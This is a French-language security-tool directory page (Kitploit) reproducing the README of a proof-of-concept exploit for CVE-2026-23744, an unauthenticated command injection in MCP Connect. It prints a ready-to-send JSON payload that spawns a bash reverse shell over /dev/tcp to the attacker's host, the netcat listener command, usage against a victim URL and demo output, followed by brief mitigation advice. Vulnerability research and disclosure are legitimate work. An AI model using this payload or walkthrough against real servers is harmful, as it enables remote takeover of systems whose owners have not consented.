Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23744 — Preuve de concept d'exploitation pour CVE-2026-23744, une injection de commande non authentifiée dans MCP Connect menant à l'exécution de code à distance et à un shell inversé. | Kitploit
Outils/GitHubGitHub/cylock11/cve-2026-23744
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubcylock11/cve-2026-23744

CVE-2026-23744

Preuve de concept d'exploitation pour CVE-2026-23744, une injection de commande non authentifiée dans MCP Connect menant à l'exécution de code à distance et à un shell inversé.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23744 — MCP Connect RCE via Unauthenticated Command Injection

Python Category Type License

⚠️ Avertissement : Ce dépôt est uniquement à des fins éducatives et de recherche en sécurité. L'utilisation de cet exploit contre des systèmes sans autorisation explicite est illégale. L'auteur décline toute responsabilité en cas de mauvaise utilisation de ce code.


📌 Description de la vulnérabilité

La vulnérabilité réside dans le point de terminaison /api/mcp/connect, qui permet à un attaquant non authentifié d'enregistrer un serveur MCP (Model Context Protocol) arbitraire avec une configuration malveillante. En l'absence de validation ou d'assainissement du champ command et de ses args, il est possible d'injecter des commandes du système d'exploitation qui s'exécutent directement sur le serveur avec les privilèges du processus web.

Cela entraîne une exécution de code à distance (RCE) qui peut être exploitée pour obtenir un reverse shell sur le système compromis.


🧠 Détails techniques

ChampDétail
TypeExécution de code à distance (RCE)
VecteurRéseau (HTTP POST sans authentification)
Point de terminaison/api/mcp/connect
Sévérité🔴 Critique
AuthentificationNon requise
ImpactContrôle total du serveur

Payload malveillant

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

Le serveur traite cette configuration et invoque la commande bash avec les arguments fournis, établissant une connexion TCP inverse vers l'attaquant.


🛠️ Prérequis

  • Python 3.x
  • Les bibliothèques suivantes :
root@kitploit:~
pip install requests termcolor

🚀 Utilisation

root@kitploit:~
python3 exploit.py -l <VOTRE_IP> -u <URL_CIBLE>

Paramètres

ParamètreDescriptionExemple
-lVotre IP (où vous recevrez le shell)192.168.1.50
-uURL de base de la ciblehttps://victim.com

Exemple complet

Terminal 1 — Listener :

root@kitploit:~
nc -nlvp 443

Terminal 2 — Exploit :

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 Démo

root@kitploit:~
[-] Veuillez exécuter la commande suivante dans un autre terminal :

[+] nc -nlvp 443

[-] Appuyez sur 'Entrée' lorsque la commande a été exécutée...

[+] Envoi de la requête d'attaque...

Une fois la requête envoyée, le listener sur le port 443 recevra la connexion inverse avec un shell interactif du serveur compromis.


🛡️ Atténuation

  • Valider et assainir tous les champs du corps de la requête dans /api/mcp/connect avant de les traiter.
  • Authentifier le point de terminaison et restreindre son accès uniquement aux utilisateurs disposant de privilèges.
  • Ne jamais exécuter de commandes système directement à partir d'une entrée utilisateur.
  • Implémenter une liste blanche des commandes autorisées.
  • Appliquer le principe du moindre privilège au processus du serveur web.

📁 Structure du dépôt

root@kitploit:~
.
├── exploit.py       # Script principal de l'exploit
└── README.md        # Ce fichier

👤 Auteur

Développé à des fins de recherche en sécurité offensive par Jorge Arana Fedriani.

Télécharger l’outil